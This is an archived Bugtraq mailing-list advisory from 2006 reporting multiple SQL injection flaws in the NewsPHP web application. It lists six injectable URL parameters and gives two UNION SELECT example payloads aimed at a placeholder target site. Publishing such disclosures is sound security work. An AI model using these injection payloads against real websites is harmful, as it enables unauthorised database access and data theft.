Newsphp Multiple SQL Injection Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Newsphp Multiple SQL Injection Vulnerabilities
From: s3ude@xxxxxxxxxxxxxxxxx, hotmail.com@xxxxxxxxxxxxxxxxx (at)
Date: 22 Jan 2006 18:50:35 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Software: NewsPHP 
Web Site: http://www.newsphp.com
Versions: All
Type: Multiple SQL Injection 
Class: Remote

Exploit :

1-

http://www.target.com/index.php?discuss=SQL

2-

http://www.target.com/index.php?tim=SQL

3-

http://www.target.com/index.php?id=SQL

4-

http://www.target.com/index.php?words=%20&where=1&limit=40&last=SQL

5-

http://www.target.com/index.php?words=%20&where=1&limit=SQL

6-

http://www.target.com/index.php?words=&where=1&submitted=true&address=E-mail+Address&action=add&rate=5&id=(SQL)&article_rate=Rate

Example :

1-

http://www.target.com/ndex.php?id=-99 union select 
null,null,null,null,null,null,null,null,null from newsphp.pro/*

2-

http://www.target.com/index.php?tim=-1 union select 
null,null,null,null,null,null,null,null,null from newsphp.pro/*

Discovered by: SAUDI

L-G-H Team

http://www.lezr.com

Regards ///

Prev by Date: [KAPDA::#25] - MyBB 1.x Cross_Site_Scripting
Next by Date: [eVuln] Text Rider Sensitive Information Disclosure
Previous by thread: [KAPDA::#25] - MyBB 1.x Cross_Site_Scripting
Next by thread: [eVuln] Text Rider Sensitive Information Disclosure
Index(es):
- Date
- Thread